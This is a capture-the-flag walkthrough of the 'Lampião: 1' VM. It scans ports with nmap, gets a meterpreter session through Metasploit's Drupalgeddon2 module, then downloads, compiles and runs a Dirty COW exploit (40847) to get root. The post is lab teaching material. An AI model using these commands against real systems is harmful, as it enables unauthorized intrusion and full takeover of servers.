CTF Challenges

Hack the Lampião: 1 (CTF Challenge)

Hello friends!! Today we are going to solve another CTF challenge “Lampião: 1”. This VM is developed by Tiago Tavares, which is a standard Boot-to-Root challenge. Our goal is to get into the root directory and see the congratulatory message.

Level: Easy

Task: To Find The Final Flag.

Let’s Breach!!

The target holds as network IP; now using nmap lets find out open ports.

nmap -p- -A

Nmap scan shows us port 22, 80, 1898 are open, so we thought of opening the IP address along with the port 1898 in our browser. It also gave us a clue about the webpage that it has Drupal running on it.

From the previous clue, we thought of exploiting it by using exploit drupal_drupalgeddon2.

msf > user explot/unix/webapp/drupal_drupalgeddon2
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rhost
msf exploit(unix/webapp/drupal_drupalgeddon2) > set rport 1898
msf exploit(unix/webapp/drupal_drupalgeddon2) > exploit

Booyah!! We have got the meterpreter, therefore we thought of checking the description about Victim’s Machine by using the command:

lsb_release -a

The description gave us a very strong hint from the Version Number of the Victim’s Machine for our Next Step.

After a long search using the earlier clue about the Version Number, We have finally found the exploit that we were looking for and we have downloaded it on our machine.

Side by Side we have executed a python server which will help us to download the exploit over Victim’s Machine.

We have download this file on server’s /tmp (universal writeable) directory. Since the exploit is in .cpp format, therefore, to compile and execute it, there were specific commands given in the code of the exploit. This gave us a hint on how to compile and execute the exploit 40847.ccp.

Boom, we got the root shell! Let’s read the flag now.

g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow
./dcow -s
cd /root
cat flag.txt

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. See’s things from a different angle and an out of the box thinker. Contact Here